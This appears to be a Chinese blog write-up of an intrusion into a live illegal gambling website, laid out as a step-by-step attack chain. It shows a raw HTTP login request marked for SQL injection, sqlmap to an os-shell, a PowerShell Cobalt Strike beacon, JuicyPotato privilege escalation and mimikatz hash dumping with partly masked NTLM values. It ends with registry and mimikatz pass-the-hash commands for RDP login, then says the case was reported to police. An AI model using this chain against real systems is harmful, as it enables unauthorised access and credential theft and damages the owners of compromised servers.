01 起 因
前几天整理笔记的时候,看到以前和各位师傅们一起学习的菠菜实战文章:
隔了这么久了,应该不会有人还在用这个站吧?于是乎,在网上一通搜寻,果然,还有人在用这个骗人,正好借着这个站再练练手吧!
tips:(这个类型的站被恰烂了)
02 实 战
目标ip:127.0.0.1:81
直接来到注入点:
POST /Login/ValidateLogin HTTP/1.1 Host: 127.0.0.1:81 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 30 Origin: http://127.0.0.1:81 Connection: close Referer: http://127.0.0.1:81/Login/index Cookie: Hm_lvt_8ee3ec23e7a2c7c9c489c151aa=1637593601; Hm_lpvt_8ee3ec23e73c6dcda2c7c9c489c151aa=1637593601 userName=admin*&password=123456
sqlmap一把梭,找到了注入点:
接下来就是获取os-shell,使用powershell上线Cobalt Strike:
CS上线成功:(这里是补的图)
03 提 权
上线之后,权限并不是system,先来一波信息搜集:
系统信息脱敏后整理如下:
beacon> shell systeminfo [*] Tasked beacon to run: systeminfo [+] host called home, sent: 41 bytes [+] received output: 主机名: xxxxxxxxxxxxxxx OS 名称: Microsoft Windows Server 2012 R2 Standard 系统类型: x64-based PC Windows 目录: C:\Windows 系统目录: C:\Windows\system32 域: xxxxxxxxxxxxxxx 修补程序: 安装了 139 个修补程序。 网卡: 安装了 2 个 NIC。
通过一段时间的搜集之后,怀疑可以使用 JuicyPotato (ms16-075)进行提权,通过师傅们的插件直接进行提权:
下图显示返回权限为system,提权成功:
04信息搜集
在里面测试下,没有发现存在av防护,直接可以dump下来hash
抓一下密码:(记录脱敏整理)
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command [+] host called home, sent: 750714 bytes [+] received output: * Username : Administrator * Domain : xxxxxx * NTLM : 1e7xxxxxx5xxxxb05 * SHA1 : fbbxxxxxxxx94c484xxx076
在线解密试试看:
能查到就行,用其他网站解密下:
https://www.somd5.com/
因为本身是云服务器,所以默认是开启了3389端口的,直接登陆:
登陆成功之后,可看到当前运行多个脚本,而且似乎还有玩家正在下注:
05利用Hash登陆RDP
如果在第4节中,NTLM的值无法解密的话,又不想通过新建用户的方式去登陆RDP,在这里可以尝试使用Hash直接登陆RDP远程桌面。
抓取hash无法破解的情况下,如果使用hash远程登录RDP,需要开启"Restricted Admin Mode", 在Windows8.1和Windows Server 2012R2上默认开启。本有两种开启方法第一种为打补丁,第二种为手动修改注册表,这里只介绍第二种还有种FreeRDP方法请参考后文三好师傅链接。 修改注册表 位置:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa 新建DWORD键值DisableRestrictedAdmin,值为0,代表开启;值为1,代表关闭 对应命令行开启Restricted Admin mode的命令如下: REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f 查看是否已开启 DisableRestrictedAdmin REG_DWORD 0x0 存在就是开启 REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin" 再使用mimikatz privilege::debug sekurlsa::pth /user:用户名 /domain:主机名 /ntlm:55b05 "/run:mstsc.exe /restrictedadmin" 以上资料参考自: https://xz.aliyun.com/t/8574
如果是在没有修改注册表的情况下去登陆:
攻击机:win10虚拟机
靶机:winserver2012
privilege::debug sekurlsa::pth /user:administrator /domain:xxxxx /ntlm:1exxxxxxxx5bx05 "/run:mstsc.exe /restrictedadmin"
这里的远程桌面用户名为win10的用户,不用管,直接登陆
此时会显示连接失败。
那就对靶机进行注册表修改:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
查看是否已开启 DisableRestrictedAdmin `REG_DWORD 0x0 存在就是开启`REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"
此时已开启,再使用mimikatz:
privilege::debug sekurlsa::pth /user:administrator /domain:xxxxx /ntlm:1exxxxxxxx5bx05 "/run:mstsc.exe /restrictedadmin"
使用win10的用户,继续,点击信任:
此时登陆成功!
06痕 迹 清 除
报告给jc处理!